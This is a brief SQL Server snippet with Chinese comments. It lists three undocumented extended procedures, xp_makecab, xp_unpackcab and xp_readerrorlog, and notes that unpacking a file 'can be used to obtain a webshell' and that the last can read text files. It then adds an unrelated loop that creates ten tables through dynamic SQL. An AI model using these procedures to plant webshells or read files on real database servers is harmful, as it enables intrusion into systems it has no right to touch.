--3个MSSQL扩展
EXEC [master].[dbo].[xp_makecab] 'D:/aa.rar','default',1,'d:/aa.asp'
--打包
EXEC [master].[dbo].[xp_unpackcab] 'D:/aa.rar','c:',1, 'aa.asp'
--解包,可以用于得到webshell
EXEC [master].[dbo].[xp_readerrorlog] 1,'d:/aa.asp'
--读文本代码
declare @sql varchar(8000), @i int
select @sql='', @i=1
while @i<=10
begin
--select @sql=@sql+' create table ['+cast(newid() as varchar(50))+'](col1 int); ', @i=@i+1
select @sql= @sql+ ' create table table_'+ convert(nvarchar, @i) +' (col1 int); ', @i=@i+1
end
exec(@sql)